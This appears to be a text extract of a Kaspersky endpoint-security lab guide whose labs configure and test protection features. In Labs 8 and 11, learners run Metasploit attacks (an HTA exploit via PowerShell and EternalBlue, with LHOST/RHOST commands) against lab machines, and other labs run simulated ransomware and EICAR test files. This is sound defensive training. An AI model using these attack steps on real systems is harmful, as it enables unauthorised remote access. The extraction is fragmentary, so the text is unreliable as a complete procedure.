KL 002.11.1 en Labs v2.1.5 PDF
KL 002.11.1 en Labs v2.1.5 PDF
KL 002.11.1 en Labs v2.1.5 PDF
KL 002.11.1
Kaspersky
Endpoint Security
and Management
Lab Guide
Kaspersky Lab
www.kaspersky.com
Table of contents
Lab 1. How to install Kaspersky Security Center ......................................................................................................... 3
Task A: Install the Kaspersky Security Center Administration Server ................................................................... 3
Task B: Install the Web console of Kaspersky Security Center .............................................................................. 7
Task C: Proceed through the Quick Start Wizard to configure Kaspersky Security Center Administration Server
............................................................................................................................................................................. 10
Lab 2. How to deploy Kaspersky Endpoint Security .................................................................................................. 17
Task A: Install Kaspersky Endpoint Security for Windows on a workstation and Kaspersky Security Center
Administration Server .......................................................................................................................................... 18
Task B: Create a standalone installation package for Kaspersky Endpoint Security .......................................... 22
Task C: Install a standalone package of Kaspersky Endpoint Security for Windows on a notebook .................. 24
Task D: Study the results of deploying protection in the network ........................................................................ 25
Lab 3. How to create a structure for the managed computers ..................................................................................... 26
Task A: Create groups for workstations, notebooks, and servers ........................................................................ 26
Task B: Move computers into groups by rules ..................................................................................................... 28
Lab 4. How to test File Threat Protection ................................................................................................................... 34
Make sure that Kaspersky Endpoint Security can detect malicious files that run within Windows Subsystem for
Linux .................................................................................................................................................................... 34
Lab 5. How to configure Mail Threat Protection ........................................................................................................ 36
Task A: Send a message with an executable file .................................................................................................. 36
Task B: Edit the attachment filter ........................................................................................................................ 37
Task C: Make sure that Mail Threat Protection does not edit attachments anymore .......................................... 39
Lab 6. How to test Web Threat Protection.................................................................................................................. 41
Task A: Make sure that Web Threat Protection scans https traffic by default ..................................................... 41
Task B: Turn off encrypted traffic scanning for the PowerShell application ....................................................... 41
Task C: Make sure that Web Threat Protection allows the trusted application PowerShell to download the test
virus over https ..................................................................................................................................................... 43
Lab 7. How to test protection of network folders against ransomware ....................................................................... 44
Task A: Simulate a ransomware infection ............................................................................................................ 44
Task B: Check how the Behavior Detection component reacted on the Tom-Laptop machine ............................ 48
Task C: Allow encryption within network shared folders and configure exclusions for trusted network devices 49
Task D: Make sure that exclusions for trusted network devices work correctly .................................................. 50
Lab 8. How to check health of Exploit Prevention ..................................................................................................... 51
Task A: Simulate a hacker attack by exploiting a vulnerability in PowerShell and get access to a remote computer
............................................................................................................................................................................. 51
Task B: Disable most of the protection components ............................................................................................ 54
Task C: Test protection against exploits .............................................................................................................. 55
Lab 9. How to test protection against fileless threats .................................................................................................. 56
Make sure that AMSI detects fileless threats........................................................................................................ 57
Lab 10. Improve workstations’ protection against ransomware ................................................................................. 58
Task A: Simulate a ransomware infection ............................................................................................................ 58
Task B: Prohibit all programs except for trusted from editing and deleting documents ..................................... 59
Task C: Configure Host Intrusion Prevention events to be stored on the Administration Server ........................ 63
Task D: Simulate encrypting a document and check the result ............................................................................ 66
Lab 11. How to test Network Threat Protection ......................................................................................................... 67
Task A: Imitate a network attack from Kali on Alex-Desktop .............................................................................. 67
Task B: Study the Network attack report ............................................................................................................. 68
Task C: Unblock the Kali computer ..................................................................................................................... 71
Task D: Configure exclusions in the properties of Network Threat Protection ................................................... 73
Task E: Imitate an attack from Kali on Alex-Desktop and study the results ........................................................ 74
L–2 KASPERSKY LAB™
KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1
Lab 1.
How to install Kaspersky Security Center
Scenario. You need to protect less than 100 computers at ABC Inc. with Kaspersky Endpoint Security for Business. One
Administration Server and the Express edition of Microsoft SQL Server are enough for managing protection within such a
network. Install Kaspersky Security Center Administration Server on a dedicated computer running Windows Server 2016.
Microsoft SQL server has been installed on the virtual machine beforehand.
Contents. In this lab, we will:
Install Kaspersky Security Center Administration Server with the default settings.
Kaspersky Security Center 11 features a new management Web Console. It is implemented as an independent component that
has a separate distribution.
16. Start the Kaspersky Security Center Web Console installer (ask
the instructor where the distribution is located)
17. Select a language for the installation wizard
L–8 KASPERSKY LAB™
KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1
Connect to the Administration Server using Kaspersky Security Center Web Console and proceed through the Quick Start
Wizard. Add an activation code. Configure notifications to [email protected] via SMTP server 10.28.0.10. Accept the
KSN agreement. Download signature updates. Do not start the Remote Installation Wizard. Enable automatic distribution for
the license.
L–11
Lab 1.
How to install Kaspersky Security Center
Conclusion
You installed the Administration Server, Kaspersky Security Center Web Console, and plugin for Kaspersky Endpoint
Security. Also, you completed the Quick Start Wizard: Created the default tasks and policies, accepted the KSN agreement,
configured notifications for the administrator, and enabled autodistribution for the key.
Further labs will teach you how to install Kaspersky Endpoint Security and Network Agent.
Lab 2.
How to deploy Kaspersky Endpoint Security
Scenario. You need to install Kaspersky Endpoint Security on the network computers. You have installed the Kaspersky
Security Center Administration Server already. Now, use the Remote Installation Wizard to install Kaspersky Endpoint
Security and Network Agent on the computers discovered by the Administration Server.
Contents. In this lab, we will:
1. Install Kaspersky Endpoint Security for Windows on a workstation and Kaspersky Security Center Administration
Server
2. Install Kaspersky Endpoint Security for Windows using a standalone package on a notebook
3. Study the installation results
L–18 KASPERSKY LAB™
KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1
Run the Remote Installation Wizard and select the Kaspersky Endpoint Security package. To be able to access the computers,
specify the domain administrator account ABC\Administrator and password Ka5per5Ky. Leave the other settings unchanged.
Wait for the task to install the applications. If the task prompts you to restart a computer, act as a user and restart it.
3. Select Kaspersky
Endpoint Security for
Windows (11.0.0) in
the list of installation
packages
4. Click Next
7. Select Kaspersky
Security Center 11
Network Agent
8. Click Next
L–19
Lab 2.
How to deploy Kaspersky Endpoint Security
From the client computer, open the KLSHARE folder on the Administration Server. Find and run the standalone package.
The task is performed on Tom-Laptop.
The DC, Security-Center, and Alex-Desktop machines must be powered on.
Study the results of the installation task. Make sure that the computers have been moved to the Managed devices group. Make
sure that Network Agent 11 and Kaspersky Endpoint Security 11.1 are installed on the computers.
Conclusion
You have installed Kaspersky Endpoint Security and Network Agent using the remote installation wizard and a standalone
package.
If an antivirus by another manufacturer is installed on a computer, the installer will uninstall it and prompt to restart the
machine.
If a firewall is running on a computer or you haven’t specified an account that has administrative permissions on the target
machines, the installation will return an error.
Lab 3.
How to create a structure for the managed
computers
Scenario. You have installed protection on the network computers and you want to configure it optimally. Assuming that
servers, desktops, and laptops need different settings, create respective groups for them and move the computers there. To save
effort in hand-moving the computers into their appropriate groups, create relocation rules and configure conditions based on
the operating systems and network parameters of the computers.
Create Servers and Workstations subgroups in the Managed devices container. Then create Desktops and Laptops
subgroups within the Workstations group.
L–27
Lab 3.
How to create a structure for the managed computers
8. Select the
Workstations group
and click Add
Open the list of rules in the properties of the Unassigned devices node. Create a rule for all computers. It will work
permanently and move servers to the Servers group. Use the Network agent is running condition and the Operating system
version condition with the Windows Server 2012 R2 and Windows Server 2016 values. You can find both conditions on the
Applications tab.
Create similar rules that will move computers to the Desktops and Laptops groups respectively. Instead of the Operating
system version, use the IP Range condition available on the Network tab. For desktop computers, specify range 10.28.0.100–
10.28.0.199; and for notebooks, 10.28.0.200–10.28.0.254.
Conclusion
You installed protection and organized the computers into groups. The default settings are optimized for an average user of
Kaspersky Endpoint Security. They reliably protect computers, and minimize the performance impact. You can adjust the
protection-comfort balance as necessary: Reinforce protection in some aspects, and maybe make concessions in some others
aiming to improve the user experience. Further labs will explain how to fine-tune the protection settings.
Lab 4.
How to test File Threat Protection
Scenario. You installed Kaspersky Endpoint Security on the network computers. By default, Kaspersky Endpoint Security
supports Windows Subsystem for Linux: It is a compatibility layer for running Linux applications in the latest versions of
Microsoft Windows. In our environment, Windows Subsystem for Linux is based on Ubuntu Linux 14.04. The administrator is
to start a test malicious file in Windows Subsystem for Linux and make sure that Kaspersky Endpoint Security 11.1 detects and
deletes it.
1. Make sure that Kaspersky Endpoint Security can detect malicious files that run within Windows Subsystem for Linux
2. Consult the File Threat Protection events
Make sure that Kaspersky Endpoint Security can detect malicious files that
run within Windows Subsystem for Linux
In this task, we will try to compile a loader for eicar.com within Windows Subsystem for Linux that is running under
Windows 10.
L–35
Lab 4.
How to test File Threat Protection
1. Press WIN+R
2. Type wsl
3. Click OK
Conclusion
This lab demonstrates how Kaspersky Endpoint Security can detect malicious files that are saved or created within Windows
Subsystem for Linux.
Lab 5.
How to configure Mail Threat Protection
Scenario. Your network computers are protected with Kaspersky Endpoint Security. When an administrator emails an
executable file to a user who is to run it and thus solve an issue, Kaspersky Endpoint Security renames the attachment. To save
time and avoid explaining the users how to rename them back, configure Mail Threat Protection not to rename files. At the
same time, criminals often use files with double extension to trick users into running a malicious executable disguised as a
document.
Contents. In this lab, configure Mail Threat Protection not to rename attached *.exe files, but rename files with double
extension *.pdf.exe.
Send a message to [email protected] with a zipped *.pdf.exe file attached. Receive the message and make sure that Mail Threat
Protection has changed the extension of the archived file.
L–37
Lab 5.
How to configure Mail Threat Protection
Switch to Tom-Laptop
4. Run Microsoft
Outlook. Select the
received message
5. Save the
Document1.zip file to
the desktop
In Kaspersky Endpoint Security policy, edit the list of attachment formats that Mail Threat Protection deletes.
L–38 KASPERSKY LAB™
KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1
8. Open Kaspersky
Security Center Web
Console
9. Go to Devices | Policies
& Profiles
10. Open the policy
Kaspersky Endpoint
Security for Windows
(11.1.0)
Task C: Make sure that Mail Threat Protection does not edit attachments
anymore
L–40 KASPERSKY LAB™
KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1
Switch to Tom-Laptop
Conclusion
You have configured Mail Threat Protection not to rename .exe files.
If the network is being attacked through email by a new virus that has not yet been added to either signature database or KSN,
configure Mail Threat Protection to rename or delete all executable attachments.
L–41
Lab 6.
How to test Web Threat Protection
Lab 6.
How to test Web Threat Protection
Scenario. Kaspersky Endpoint Security can scan https traffic under the default settings. It replaces the certificate for this
purpose, which sometimes may affect banking and other software that uses a certificate of its own. To avoid interaction issues,
Kaspersky Endpoint Security permits excluding encrypted traffic from scanning.
1. Make sure that Web Threat Protection scans https traffic under the default settings
2. Turn off encrypted traffic scanning for the PowerShell application
3. Make sure that Web Threat Protection allows the trusted application PowerShell to download the test virus over https
Task A: Make sure that Web Threat Protection scans https traffic by default
Run PowerShell, try to download the eicar_com.zip file, and check how Kaspersky Endpoint Security will react.
1. Press WIN+R
2. Type powershell
3. Click OK
4. Download the eicar_com.zip file via PowerShell over https. Carry out the following command:
Invoke-WebRequest –uri “https://secure.eicar.org/eicar_com.zip” -OutFile
“C:\temp\eicar_com.zip”
5. Make sure that Kaspersky Endpoint Security has blocked the download. Do not close the PowerShell window
Task B: Turn off encrypted traffic scanning for the PowerShell application
Add PowerShell to the list of trusted applications, try to download the eicar_com.zip file, and check how Kaspersky Endpoint
Security will react.
L–42 KASPERSKY LAB™
KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1
Task C: Make sure that Web Threat Protection allows the trusted application
PowerShell to download the test virus over https
Download the eicar_com.zip file from the www.eicar.org website through the PowerShell application once again. Make sure
that Web Threat Protection will not block the test virus if it is downloaded via a trusted application.
21. Download eicar_com.zip over the https secure protocol one more time. Carry out the following command:
Invoke-WebRequest –uri https://secure.eicar.org/eicar_com.zip -OutFile
“C:\temp\eicar_com.zip”
L–44 KASPERSKY LAB™
KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1
Conclusion
This lab demonstrates how to add an application to the trust list and prevent scanning its encrypted traffic.
The option Do not scan network traffic configured for trusted programs applies to the Mail Threat Protection, Web Threat
Protection, and Web Control components, and does not influence the Firewall or Network Threat Protection.
Lab 7.
How to test protection of network folders
against ransomware
Scenario. Your network computers are protected with Kaspersky Endpoint Security and managed via Kaspersky Security
Center. Of all threats, you are most concerned about ransomware that encrypts data in shared folders. If Kaspersky Endpoint
Security fails to detect a new malware version one day, the company will lose much money. You want to use the Behavior
Detection protection component to counter ransomware.
Find the ransomware2.bat script on the desktop of the Alex-Desktop computer and run it. It imitates ransomware: Encrypts
files in shared network folders and deletes the originals.
Make sure that Kaspersky Endpoint Security 11.1 restored the invoice.txt file and the Alex user cannot modify files in the
network shared folder anymore.
L–45
Lab 7.
How to test protection of network folders against ransomware
8. In Essential Threat
Protection, select
Firewall
Task B: Check how the Behavior Detection component reacted on the Tom-
Laptop machine
Consult the report of the Behavior Detection protection component on Tom-Laptop. Note the actions that the protection
component performed.
In some cases, Behavior Detection may consider operations performed by design engineering applications as crypto-
ransomware activities. To prevent false positives, we recommend that you add computers to trusted. Select the Administration
Server and edit the Kaspersky Endpoint Security policy. Add the IP address of the Alex-Desktop computer to the list of
exclusions of the Behavior Detection component.
Task D: Make sure that exclusions for trusted network devices work
correctly
The task is performed on Alex-Desktop.
The DC, Security-Center, and Tom-Laptop machines must be powered on.
Conclusion
In this lab, we demonstrated that Kaspersky Endpoint Security can detect malicious ransomware activity with the default
settings. The Behavior Detection component takes care of that.
If necessary, the administrator can always specify exclusions for the protection component and allow specific network devices
to encrypt files in shared folders.
L–51
Lab 8.
How to check health of Exploit Prevention
Lab 8.
How to check health of Exploit Prevention
Scenario. Criminals can exploit vulnerabilities much easier than one would imagine. With such a powerful tool as Metasploit
Framework, a criminal can create an exploit and send it to unsuspecting company employees.
1. Simulate a hacker attack by exploiting a vulnerability in PowerShell and get access to a remote computer
2. Enable protection against exploits
On the Kali computer, run the Metasploit Framework penetration utility. Attack HTA (HTML Application) via PowerShell.
1. Exit Kaspersky Endpoint Security: Right-click its icon in the notification area
and on the shortcut menu, select Exit
4. Start the Metasploit Framework console. Carry out the following command:
msfconsole
6. Display the list of applications vulnerable to this exploit. Carry out the following command:
show targets
L–52 KASPERSKY LAB™
KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1
9. Specify the address of the listening server (address of the Kali computer). Carry out the following command:
set LHOST 10.28.0.50
11. Copy the link (right-click, Copy Link) http://10.28.0.50:8080/<name of the generated file>.hta from the Terminal to
the clipboard
Switch to Tom-Laptop.
23. Connect to the created session. Carry out the following command:
sessions 1
where 1 is the number of the recently created session
24. You have got full remote access to the Tom-Laptop machine
In this task, you will disable most of the Kaspersky Endpoint Security protection components.
In this task, you will enable the Exploit Prevention component and test it.
Conclusion
In this lab, we made sure that the multitier defense system of Kaspersky Endpoint Security permits repelling advanced threats
even when the main protection components are disabled.
Lab 9.
How to test protection against fileless threats
Scenario. Recently, a new threat vector has become popular, which uses PowerShell, a powerful operating system
administration and management tool. Criminals can run their code in the address space of the PowerShell process. A fileless
attack is hard to detect since malicious code is executed in the memory, unlike an ordinary virus that stores its files on the local
drive. Typically, attacks via PowerShell are performed after the machine has been compromised using other malicious actions,
usually, exploitation of software vulnerabilities.
Contents. In this lab, we will disable KSN and test how antimalware scan interface (AMSI) detects fileless threats.
L–57
Lab 9.
How to test protection against fileless threats
1. Open c:\temp
2. Unpack the bsstest_amsi archive
3. Enter the password infected
4. Press WIN+R
5. Type powershell
6. Click OK
8. Run the test PowerShell script. Carry out the following command:
.\bsstest_amsi.ps1
Conclusion
You’ve made sure that even if some of the protection components are disabled, Kaspersky Endpoint Security can efficiently
interact with the script interpreters built into Microsoft Windows operating systems to detect and block malicious code.
Lab 10.
Improve workstations’ protection against
ransomware
Scenario. Your network computers are protected with Kaspersky Endpoint Security and managed via Kaspersky Security
Center. Of all threats, you are most concerned about crypto ransomware. If Kaspersky Endpoint Security fails to detect a new
malware version one day, the company will lose much money. To decrease the risk, configure Host Intrusion Prevention to
prohibit all programs except for trusted from editing documents on the computers.
Find the ransomware.bat script on the desktop of the Tom-Laptop computer and run it. It is designed to encrypt text
documents and delete the original files.
L–59
Lab 10.
Improve workstations’ protection against ransomware
Task B: Prohibit all programs except for trusted from editing and deleting
documents
Open the Host Intrusion Prevention settings in the Kaspersky Endpoint Security policy. Find the list of protected resources.
Create a Documents category. Add files with the *.txt extension to it. Prohibit all programs except for trusted from editing,
deleting, and creating files of this category.
7. Open Kaspersky
Security Center Web
Console
8. Go to Devices | Policies
& Profiles
9. Open the policy
Kaspersky Endpoint
Security for Windows
(11.1.0)
35. Configure Host Intrusion Prevention to log attempts to edit documents. Enable Log events for the Write, Delete, and
Create actions
36. Click OK twice to save the access rights
37. Click Save to save the policy
38. Wait for the policy to be enforced
L–63
Lab 10.
Improve workstations’ protection against ransomware
Open event settings in the policy. Find information events of Host Intrusion Prevention: Application placed in restricted
group and Application privilege control rule triggered. Configure the policy to store these events on the Administration
Server.
41. Switch to the Event configuration section and open the Info
tab
42. Click the Event type header to sort the list alphabetically and
select the event Application placed in restricted group
43. Open the event’s properties: Click the Properties button below
the list
L–64 KASPERSKY LAB™
KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1
Find the ransomware.bat script on the desktop of the Alex-Desktop computer and run it. It is designed to encrypt text
documents and delete the original files. Make sure that the script cannot delete the text file this time.
Consult the Host Intrusion Prevention events on the Administration Server. Make sure that it was Host Intrusion Prevention
that did not allow the script to delete the text document.
61. Make sure that the invoice.txt.aes file has appeared on the desktop, but the invoice.txt file has not been deleted
Conclusion
You have configured Host Intrusion Prevention to allow only trusted programs to edit text documents. To properly protect
against ransomware, add more document types to the category: *.doc, *.docx, *.xlsx, etc.
Programs by known vendors, such as Microsoft Office, are trusted, and Host Intrusion Prevention will not restrict them.
Ransomware, even new that has not yet been added to the signature database or KSN, will never get in the trusted category and
will not be able to edit documents.
L–67
Lab 11.
How to test Network Threat Protection
Lab 11.
How to test Network Threat Protection
Scenario. Your network computers are protected with Kaspersky Endpoint Security and managed via Kaspersky Security
Center. You scan your network periodically with a special security scanner to find out whether the computers are properly
shielded. Kaspersky Endpoint Security blocks attacks on the scanned computers and then blocks any connections from the
attacking computer for an hour. Add the computer from which you perform vulnerability scanning to the list of exclusions.
On the Kali computer, run the Metasploit Framework penetration utility. Perform an Eternalblue attack.
EternalBlue exploits a vulnerability in Server Message Block (SMB) v1 protocol. A criminal can generate a specially prepared
package, transfer it to a remote computer, thus get remote access to the system, and run any code there.
3. Start the Metasploit Framework console. Carry out the following command:
msfconsole
6. Specify the address of the listening server (address of the Kali computer). Carry out the following command:
set LHOST 10.28.0.50
L–68 KASPERSKY LAB™
KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1
7. Specify the address of the victim machine. Carry out the following command:
set RHOST 10.28.0.100
The attack fails because Kaspersky Endpoint Security blocks network attacks by default.
Find the list of reports in the Administration Console. Create a new template for the Network attack report. Generate the
report, consult the details of the network attack, find the addresses of the attacking and attacked machines.
9. Open Kaspersky
Security Center Web
Console
10. Switch to the
Monitoring &
Reporting | Reports
tab
11. Click Add
Open Kaspersky Endpoint Security on the attacked computer. Use the shortcut menu of the Firewall component to open
Network Monitor. Find the list of blocked computers and unblock the Kali computer.
L–72 KASPERSKY LAB™
KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1
In the Kaspersky Endpoint Security policy, open the Network Attack Blocker settings. Find the list of trusted computers and
add the IP address of the Kali computer (10.28.0.50) to it.
49. Click OK
50. Click Save to save the
policy
51. Wait for the policy to be
enforced
Task E: Imitate an attack from Kali on Alex-Desktop and study the results
Simulate another attack on the computer Alex-Desktop from Kali using Metasploit Framework. Make sure that Kaspersky
Endpoint Security does not react to this attack anymore.
55. Make sure that you have exploited the vulnerability in SMB protocol
L–75
Lab 12.
How to configure exclusions from self-defense
56. Display the list of directories. Carry out the following command:
dir
Conclusion
You have configured Network Threat Protection not to react to attacks from the specified IP address. You can use this method
to exclude addresses of network security scanners.
Also, you have created a new report and a new event selection. There are many types of reports in Kaspersky Security Center.
If the pre-configured reports available on the Reports tab are insufficient, have a look at the complete list of reports that you
can create.
If none of them yet meets your needs, create a selection of events that interest you. Configure conditions: Event types, time,
group of computers, etc.
Lab 12.
How to configure exclusions from self-defense
Scenario. Your network computers are protected with Kaspersky Endpoint Security and managed via Kaspersky Security
Center. To remotely help employees, you connect to their machines through Windows Remote Assistance. However,
Kaspersky Endpoint Security does not react to your actions via Windows Remote Assistance. Make an exclusion for Windows
Remote Assistance to be able to manage Kaspersky Endpoint Security remotely.
1. Try to interact with Kaspersky Endpoint Security via Windows Remote Assistance
2. Allow Windows Remote Assistance to interact with Kaspersky Endpoint Security
3. Open the local report of Kaspersky Endpoint Security in a Windows Remote Assistance session
Run Windows Remote Assistance on Alex-Desktop, remember the ID and password. Run Windows Remote Assistance on
Tom-Laptop and connect to Alex-Desktop. Open Kaspersky Endpoint Security interface. Try to open the Reports window.
L–76 KASPERSKY LAB™
KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1
1. Run Outlook
2. Press WIN+R
3. Type msra in the field
4. Click OK
Switch to Tom-Laptop
16. Allow Tom to connect to your workstation. In the window that opens,
click Yes
L–78 KASPERSKY LAB™
KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1
Switch to Tom-Laptop
18. Allow Tom to manage your workstation. In the window that opens,
click Yes
Switch to Tom-Laptop
Open the policy of Kaspersky Endpoint Security. Find the list of trusted programs. Add the msra.exe file to the list of trusted
applications. Allow it to interact with the Kaspersky Endpoint Security interface.
Use Windows Remote Assistance to connect from Tom-Laptop to Alex-Desktop. Open the Reports window in Kaspersky
Endpoint Security.
Conclusion
You have allowed a remote access application to interact with Kaspersky Endpoint Security interface.
L–81
Lab 13.
How to configure password protection
Lab 13.
How to configure password protection
Scenario. Your network computers are protected with Kaspersky Endpoint Security and managed via Kaspersky Security
Center. To prevent the users from disabling the protection, prohibit managing Kaspersky Endpoint Security and Network
Agent without a password.
Find the message informing that protection is disabled on some computers on the Monitoring page. Go to the selection of
computers where protection is off. Open the computer properties, find the Kaspersky Endpoint Security application and start it.
3. Log on to the
abc\Administrator
account with the
password Ka5per5Ky
4. Open Kaspersky
Security Center Web
Console
5. Switch to the
Monitoring &
Reporting | Dashboard
tab
6. Note that one of the
devices has the Critical
protection status
7. Click the Critical link
to consult the list of
devices that have this
status
L–82 KASPERSKY LAB™
KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1
In the policy of Kaspersky Endpoint Security for workstations, find password protection among the Interface settings. Enable
password protection and apply it to critical operations with Kaspersky Endpoint Security.
On the Tom-Laptop computer, try to exit Kaspersky Endpoint Security. Make sure that you cannot exit the application without
the password. Try to uninstall Kaspersky Endpoint Security through the Windows Control Panel. Make sure that this operation
is also password-protected.
Make sure that you need to enter credentials to perform some actions within the program.
35. In the Password check window, enter the abc\Alex account and
password Ka5per5Ky
36. Make sure that the application has been closed successfully
Open the Network Agent policy and find the password protection settings there. Enable password protection, type a password
and make these settings required; meaning, prohibit users from modifying them.
On the Tom-Laptop computer, try to uninstall the Network Agent. Do not enter the password and make sure that you cannot
uninstall Network Agent without it.
Switch to Tom-Laptop
Conclusion
You have enabled password protection for Kaspersky Endpoint Security and Network Agent. Now the users cannot uninstall
Kaspersky Lab applications, exit Kaspersky Endpoint Security, or stop protection.
Neither can they stop the service or process of Kaspersky Endpoint Security. Kaspersky Endpoint Security self-defense
prevents this.
To hide the fact that Kaspersky Endpoint Security is installed on the computer from the users, select not to display KES icon in
the notification area. This setting is located in the Interface section of Kaspersky Endpoint Security policy.
Lab 14.
How to configure Application Control
Scenario. You are an administrator at ABC Inc. whose network is protected with Kaspersky Endpoint Security. It is managed
via the Kaspersky Security Center.
According to the corporate security policy, Internet Explorer is the only allowed web browser. All available security updates
are downloaded for it on a regular basis, while the updates of other browsers are not. Considering the fact that malware
typically penetrate a network through browsers today, the decision to prohibit all other browsers was made.
Your task is to enforce the security policy requirements. You need to block all browsers except for Internet Explorer using
Application Control.
Task A: Create a category for all web browsers except Internet Explorer
Create an application category that includes all browsers except for Internet Explorer 11.0 or later. To add all browsers, use
Kaspersky Lab (KL) categories. To exclude Internet Explorer, use the metadata of the iexplore.exe file.
1. Open Kaspersky
Security Center Web
Console
2. Open the Operations
tab. On the Third-party
applications drop-down
menu, click
Application categories
3. To create a new
category, click Add
7. To specify a new
condition for the
category, click Add
8. Select From KL
category
9. Click Next
L–90 KASPERSKY LAB™
KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1
24. Click OK
Task B: Prohibit the users from starting any browsers except for Internet
Explorer
Open the Application Control settings in the Kaspersky Endpoint Security policy of the Workstations group. Enable
Application Control and select the Block mode instead of Notify.
Add a rule that prohibits starting programs of the Browsers category that you created in the previous task.
L–92 KASPERSKY LAB™
KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1
Make sure that the users are able to launch Internet Explorer but not Mozilla Firefox.
Conclusion
If you need to allow or prohibit a group of programs, Kaspersky Lab categories come in very handy. The categories are
updated when database updates are run, and you can feel confident that the latest versions of popular browsers are added and
applied automatically.
When setting up Application Control, remember: Rules configured to deny access will always have a higher priority than ones
that allow access. For this reason, if you need to prohibit a program category except for a few applications, you will need to
create a rule to block access and add exclusions for the allowed applications, which was demonstrated in this lab. Any other
configuration will not work.
L–95
Lab 15.
How to block start of unknown applications in the network
Lab 15.
How to block start of unknown applications in
the network
Scenario. You are an administrator at ABC Inc. whose network is protected with Kaspersky Endpoint Security. It is managed
via the Kaspersky Security Center. Application Control, as well as Host Intrusion Prevention, can decrease the risk of
becoming infected by new malware. Let us configure Application Control to block start of all files except for trusted within
specific operating system directories.
In this task, you will create an application category for crypto ransomware.
1. Open Kaspersky
Security Center Web
Console
2. Open the Operations
tab. On the Third-party
applications drop-down
menu, select
Application categories
4. Type Protection
Cryptomalware for the
category name
5. For the category
creation method, select
Category with content
added manually
6. Click Next
L–96 KASPERSKY LAB™
KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1
7. To create a condition,
click Add
8. Copy the
Conditions_Protection_Cryptomalware.txt file to
your desktop. Ask the trainer where to find the file
9. Open the file
Conditions_Protection_Cryptomalware.txt in
Notepad
22. Click OK
L–98 KASPERSKY LAB™
KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1
Task B: Change the policy so as to prohibit all users from starting unknown
files
Open the Application Control settings in the Kaspersky Endpoint Security policy of the Workstations group. Enable
Application Control and select the Block mode instead of Notify.
Add a rule that prohibits starting programs of the Protection Cryptomalware category that you created in the previous task.
35. Click OK
36. Click OK
37. Click OK
38. Save the policy: Click
Save and Yes
39. Wait for the policy to be
applied
In this task, you will make sure that Kaspersky Endpoint Security blocks start of unknown files.
Conclusion
This lab demonstrates how the administrators, by properly configuring the product, can block the start of new and unknown
files on the endpoints. By doing so, they will limit the likelihood of an infection on the protected machines.
Lab 16.
How to block USB flash drives
Scenario. You are an administrator at ABC Inc. whose network is protected with Kaspersky Endpoint Security. It is managed
via the Kaspersky Security Center.
Incident analysis has revealed that a bunch of computers had become infected through USB flash drives. The decision was
made to eliminate this penetration vector. Your task is to block access to all USB flash drives using Kaspersky Endpoint
Security on all workstations in ABC network.
In this task, we will learn how to configure notifications for terminal users in the policy.
L–103
Lab 16.
How to block USB flash drives
6. Open Kaspersky
Security Center Web
Console
7. Go to Devices | Policies
& Profiles
8. Open the policy
Kaspersky Endpoint
Security for Windows
(11.1.0)
9. Switch to the
Application Settings
tab
10. Open the Security
Controls section
11. Select the Device
Control component
L–104 KASPERSKY LAB™
KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1
In this task, we will try to access the device already connected to the computer.
In this task, we will receive a USB drive access request from the user.
Conclusion
In this lab, we studied how to block access to removable drives. Aside from blocking access completely, you can also allow
access upon request or allow specific devices only. Typically, administrators will use this functionality to block the spread of
malware through removable drives on the network. This feature can also help to prevent data leakage.
Lab 17.
How to configure granular permissions for USB
flash drives
Scenario. You are an administrator at ABC Inc. whose network is protected with Kaspersky Endpoint Security. It is managed
via the Kaspersky Security Center.
You have prohibited access to USB flash drives throughout the company. However, the measure turned out to be too
aggressive as some users need USB flash drives for work related tasks. The decision to allow all users to use encrypted USB
flash drives has been made at the company.
Now, we will allow the users to read and copy files from USB flash drives; add encrypted USB flash drives to trusted devices
and thus allow domain users to access them without limitations; and also configure logging operations with these USB flash
drives.
Task A: Prohibit all users from writing files to USB flash drives
Open the Device Control settings in the Kaspersky Endpoint Security policy of the Workstations group. Enable the users
(Everyone) to read files from removable drives.
6. Open Kaspersky
Security Center Web
Console
7. Go to Devices | Policies
& Profiles
8. Open the policy
Kaspersky Endpoint
Security for Windows
(11.1.0)
9. Switch to the
Application Settings
tab
10. Open the Security
Controls section
11. Select the Device
Control component
L–109
Lab 17.
How to configure granular permissions for USB flash drives
Switch to Tom-Laptop
Task B: Allow domain users to write files to trusted USB flash drives
Open the Device Control settings in the Kaspersky Endpoint Security policy of the Workstations group. Make the removable
drive trusted for the Domain users group. Select to log events when users write files to USB flash drives.
36. Click OK
L–113
Lab 17.
How to configure granular permissions for USB flash drives
43. Click OK
Switch to Tom-Laptop
54. Copy the invoice.txt file from the desktop to the USB flash drive
55. Make sure that Kaspersky Endpoint Security allows you to write files to a trusted device
Conclusion
In this lab, we studied how to control user access rights to USB flash drives along with making exclusions for specific drive
types. There are always users at a company (secretaries, for example) who need to copy data to/from various USB flash drives
whose model and serial number are usually not known in advance.
Others (like administrators, for example) typically have this information readily available. You can configure exclusions for
these drives. The policy provides for flexible adjustments: You can create a list of specific USB flash drives that are to be
accessible, and specify users and/or groups who use them.
Lab 18.
How to configure web access control
Scenario. You are an antivirus security administrator at ABC Inc. whose network is protected with Kaspersky Endpoint
Security. It is managed via the Kaspersky Security Center. When analyzing the company’s internet traffic, you have found that
many users visit cryptocurrency exchange websites during business hours. Based on this information, you would like to
prohibit that by setting up a policy to specifically block access to the respective content category.
L–116 KASPERSKY LAB™
